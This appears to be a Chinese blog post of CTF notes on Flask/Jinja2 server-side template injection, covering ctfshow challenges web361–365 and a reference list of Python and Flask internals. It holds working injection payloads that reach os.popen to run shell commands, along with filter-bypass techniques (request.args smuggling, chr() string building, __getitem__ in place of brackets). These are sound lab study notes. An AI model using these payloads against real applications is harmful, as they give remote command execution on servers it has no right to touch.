SSTI知识点与题型

已于 2022-04-17 00:37:21 修改
阅读量505 收藏 3
点赞数 2
分类专栏: SSTI 笔记 文章标签: sql
于 2022-04-15 01:09:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbbjya/article/details/124185476
版权
笔记 同时被 2 个专栏收录
45 篇文章 0 订阅
订阅专栏
SSTI
3 篇文章 0 订阅
订阅专栏

web361

首先会出现这样的界面

?name={{1%2b1}}hello

%2b= + %2b是url编码

?name={{1+1}}hello

执行成功说明是有模板注入
在这里插入图片描述
这个也可以用但是在web362就不能通用了

?name={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

在这里插入图片描述从查询的语句中看到了flag然后直接cat flag就可以得到了

?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

Config 获取文件中的config配置
os.popen() 方法用于从一个命令打开一个管道。
OS一般指操作系统。 操作系统(operating system,简称Os
os模块概述Python os模块包含普遍的操作系统功能。
?name={{ config.class.init.globals[‘os’].popen(‘cat …/flag’).read() }}
这个语句的意思就是将使用config方法获取object类所有的子类的内容系统文件下的根目录里面的flag文件并且读取出来(我自己是这样理解的)

web362

一样的playload可以得到
在这里插入图片描述

web363

?name={{ config._class_._init_._globals_['os'] }}

这样没有显示说明引号被过滤了
在这里插入图片描述?name={{ config.__class__.__init__.__globals__[request.args.a]}}&a=os
在这里插入图片描述
?name={{ config.__class__.__init__.__globals__[request.args.a].popen(request.args.b)}}&a=os&b=cat../flag
出现这样的原因是因为我们没有写read()
在这里插入图片描述像这样就可以得到flag了这是单引号绕过
?name={{ config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag
在这里插入图片描述

364

说明引号和args 被过滤了 ,这时我们就需要一种新的方法进行过滤
在这里插入图片描述
检测chr()函数的位置使用bp抓包

?name={{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}}

在这里插入图片描述
发送intruder 然后爆破
在这里插入图片描述

__subclasses__()[]

中含有chr的类索引,即可以使用chr()
在这里插入图片描述
接下来把这一串{%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}放到前面
'os’替换成chr(111)%2bchr(115)
'cat …/f*'替换成chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)

?name={%set+chr=[].__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__.chr%}{{ config.__class__.__init__.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read() }}

365

比上题又多过滤了一个中括号

中括号绕过
可以用__getitem__和pop代替,因为pop会破坏数组的结构,所以更推荐用__getitem__

观察上题的payload,一共有四处中括号

getitem代替

第一处的[]直接换成()即可
第二处的[0]换成.getitem(0)或者直接删去
第三处的[80]换成.getitem(80)
第四处的[chr(111)%2bchr(115)]换成.getitem(chr(111)%2bchr(115))

?name={%set+chr=().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(80).__init__.__globals__.__builtins__.chr%}{{ config.__class__.__init__.__globals__.__getitem__(chr(111)%2bchr(115)).popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)).read() }}

pop代替

暂时先不写了

ssti知识点汇总

__class__            类的一个内置属性,表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类,返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文,一个全局变量。

request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>

常用过滤器

从别的师傅那摘录的



int():将值转换为int类型;

float():将值转换为float类型;

lower():将字符串转换为小写;

upper():将字符串转换为大写;

title():把值中的每个单词的首字母都转成大写;

capitalize():把变量值的首字母转成大写,其余字母转小写;

trim():截取字符串前面和后面的空白字符;

wordcount():计算一个长字符串中单词的个数;

reverse():字符串反转;

replace(value,old,new): 替换将old替换为new的字符串;

truncate(value,length=255,killwords=False):截取length长度的字符串;

striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;

escape()或e:转义字符,会将<>等符号转义成HTML中的符号。显例:content|escape或content|e。

safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}}list():将变量列成列表;

string():将变量转换成字符串;

join():将一个序列中的参数值拼接成字符串。示例看上面payload;

abs():返回一个数值的绝对值;

first():返回一个序列的第一个元素;

last():返回一个序列的最后一个元素;

format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!

length():返回一个序列或者字典的长度;

sum():返回列表内数值的和;

sort():返回排序后的列表;

default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。

length()返回字符串的长度,别名是count
abs(value):返回一个数值的绝对值。示例:-1|abs
last(value):返回一个序列的最后一个元素。示例:names|last。
length(value):返回一个序列或者字典的长度。示例:names|length。
join(value,d=u''):将一个序列用d这个参数的值拼接成字符串。
int(value):将值转换为int类型。
float(value):将值转换为float类型。
lower(value):将字符串转换为小写。
upper(value):将字符串转换为小写

知识点分析总结

__mro__会返回到它的基类,而__subclasses__会输出该类下所有的子类

__init__
所有自带带类都包含init方法,便于利用他当跳板来调用globals。


function.__globals__,用于获取function所处空间下可使用的module、方法以及所有变量。
_class_  获得某个类,实际可以获得任何类,但我们的最终目的是要获取object基类

这样可以获取object基类

```cpp
._class_._bases_
._class_._mro_[1]

获取所有的子类

._class_._mro_[1]._subclasses_()


# 这个是playload的解释

```cpp
?name={{ config.__class__.__init__.__globals__['os'].popen('cat ../flag').read() }}

Config 获取文件中的config配置
os.popen() 方法用于从一个命令打开一个管道。
OS一般指操作系统。 操作系统(operating system,简称Os
os模块概述Python os模块包含普遍的操作系统功能。
?name={{ config.class.init.globals[‘os’].popen(‘cat …/flag’).read() }}
这个语句的意思就是将使用config方法获取object类所有的子类的内容系统文件下的根目录里面的flag文件并且读取出来(我自己是这样理解的)

我发现的一个特别好的知识点整理网站

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig

详情可看:https://blog.csdn.net/u011377996/article/details/86776181

绕过方法总结

request.args传参绕过(可用在单引号的过滤中)

参考详细文章Flask request 属性详解: https://blog.csdn.net/u011146423/article/details/88191225

zbbjya
关注
专栏目录
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
2401_84009698的博客
04-20 1032
外链图片转存中…(img-6fV9ce6x-1713552193682)]
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记(1)
2401_84009626的博客
04-20 827
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)建议用nssctf在线 https://www.nssctf.cn/problem/13 直接用。完全可以替换为 request.args.参数名(get方式)用[] 代替 . 其他方法 参考 获取属性的四种方法。尝试写静态文件 请先了解 flask 静态目录概念。以下题目我用简洁的payload 绕过。{{}} 等价于 {%print%}通过过滤器 | join 返回变量。通过 |attr()
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1564
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字、print、(372过滤了count)被过滤绕过(ctfshow web入门371-372)
T1ngSh0w的博客
03-30 463
CTFshow web入门371 CTFshow web入门372 中括号、args、下划线、引号、os、request、花括号、数字、print、(372过滤了count) SSTI模板注入漏洞
CTFshow刷题日记-WEB-信息收集
Love&Share
09-02 3241
信息收集 web1 题目提示开发注释未及时删除,所以直接f12 web2 提示:js前台拦截 ctrl+u查看源代码 web3 提示:没思路的时候抓个包看看,可能会有意外收获 浏览器f12 network 但是在burp中需要发送两次 第一次是重定向 web4 提示:总有人把后台地址写入robots,帮黑阔大佬们引路。 这都提示到这个份上了,直接访问rebots.txt即可 访问/flagishere.txt拿到flag web5 提示:phps源码泄露有时候能帮上忙 访问index.phps文
CTFshow刷题日记-WEB-SQL注入part1(171-184)
Love&Share
09-19 1162
SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。 如果 number 是正数,返回第 number 个字符左边的字符串。
CTFshow刷题日记-WEB-爆破
Love&Share
09-03 3338
web21 提示:爆破什么的,都是基操 有一个zip文件,解压是一个爆破字典 Authorization: Basic dG9tY2F0OmFkbWlu ------->输入的用户名/口令以base64的形式传输。认证失败显示401 认证成功为200 将Authorization字段后面的值进行base64 解码,即可获取用户认证信息明文 使用bp的Intruder模块 payload type 选择custom iterator(自定义迭代器) 自定义迭代器可以自定义拼接方式,positio
fenjing工具,ssti
12-17
当Web应用程序不恰当地将用户输入的数据与模板引擎结合时,就可能发生SSTI。 在利用SSTI的过程中,Fenjing可能会提供多种方法来探测和利用这些漏洞。例如,它可能包含预定义的payload库,这些payload可以被注入到...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti
2h4ox1n9
05-23 988
[第三章 web进阶]SSTI {{"".__class__.__bases__[0].__subclasses__()}} 执行结果中找到 os命令执行类<class 'os._wrap_close'>从头开始复制到os那里,粘贴到word文档里搜索个128结果,下标127 {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}} 列目录 ...
ctfshow-web361(SSTI)
m0_62094846的博客
04-23 626
看到Hello,猜测输入的参数是name
CTFshow刷题日记-WEB-黑盒测试(web380-395)文件包含、日志包含getshell、SQL注入
Love&Share
10-07 3212
web380-扫目录文件包含 扫目录,存在page.php 访问发现报错,$id参数,可能存在文件包含 /page.php?id=flag web381-读源码找后台地址 page.php已经无法文件包含 看源码有一个可疑的路径 访问这个目录,最后注意一定要带上/ web382-383弱口令加万能密码 上题的/alsckdfy/目录访问之后是个登录界面 burp抓包爆破就行了,p字段,这些都可以拿到flag web384-爆破密码 提示:密码前2位是小写字母,后三位是数字 这肯定是后台密码了,
CTFSHOW 刷题记录
errorr0
03-20 1378
手注sql?狗看了都摇头,当然要用脚本跑撒!!
CTF.show | Misc | 刷题日记(不定期更新)
pone2233的博客
01-22 1572
CTF.show-Misc 杂项签到 打开winhex 修改一下他 参数,因为他是伪加密 改成00 flag{79ddfa61bda03defa7bfd8d702a656e4} misc2 这个直接打开虚拟机 flag{ctfshow} miscx 解压到最后我们发现了能解压出来一个图片 这个图片我们知道了zip的密码是2020,然后获得一个音符加密 ♭‖♭‖‖♯♭♭♬‖♩♫‖♬∮♭♭¶♭‖♯‖¶♭♭‖∮‖‖♭‖§♭‖♬♪♭♯§‖‖♯‖‖♬‖‖♪‖‖♪‖¶§‖‖♬♭♯‖♭♯♪‖‖∮‖♬§♭‖
ctfshow 刷题记录
m0_73867210的博客
02-15 167
一、web39 看到有过滤,有include想着怕不是又是文件包含 因为这个我不太会搜了下其他博主的文章,果然如此,那就照着别的人写呗,顺便看一下新知识 网上是用的tac,但是我想着cat不是应该也行吗就用了下,没想到也出来,那为啥用tac呢?我又搜了下这两啥区别 还有个.php弄了半天这个,网上说是啥后缀,我也不知道,然后直到看到这个 我真是服了呀 二、web40 看不懂,又搜了下 其他博主说要用套娃,嗯,搜
SSTI模板注入漏洞详解(包含ctfshow web入门361)
T1ngSh0w的博客
03-16 1702
服务端接收了攻击者的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了攻击者插入的可以破坏模板的语句,从而达到攻击者的目的。
CTFshow刷题日记-MISC-图片篇(下 24-51)文件结构与颜色通道
Love&Share
09-11 4632
文件结构篇 misc24-bmp改高度 提示:flag在图片上面 bmp格式文件 真flag在图片上面,改一下高度就可以看到了 misc25-png改高度 提示:flag在图片下面 改高度即可 misc26-crc32 提示:flag还是在图片下面,但到底有多下面? 用tweakpng打开文件 通过python2脚本来获取图片高度 # -*- coding: utf-8 -*- import binascii import struct #\x49\x48\x44\x52\x00\x00\x01\
CTFshow刷题日记-WEB-文件上传
Love&Share
09-08 1520
web151-前端绕过 简单只要在前端把exts:png改成php exts:'php' 访问 /upload/shell.php?shell=system("tac ../flag.php"); web152-content-type绕过 这次不改前端了,直接在bp改,将Content-Type改成 image/png 总结下常见conten-type类型 常见的媒体格式类型如下: text/html : HTML格式 text/plain :纯文本格式 text/xml : XML格式 im
ctfshow web入门 SSTI注入 web361--web368
最新发布
2301_81040377的博客
05-15 453
过滤了中括号 下划线 单引号 双引号 globals、getitem args。说实话这里对py不太好的朋友有点不友好,因为payload都是py的。这里用popen方法来执行命令。上题一样的payload可以用。这里是把引号过滤了我们可以用。然后使用flask过滤器。上题一样的payload。hint:考点就是题目。
Flask SSTI与沙箱逃逸技术分析
0x02 测试代码与Flask SSTI 在Flask框架中,开发者需要警惕模板注入的风险。示例代码显示,旧的触发SSTI的方式(如使用`request.url`)在新版本的Flask中已被修复,因为`request.url`的值会被自动进行URL编码。为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值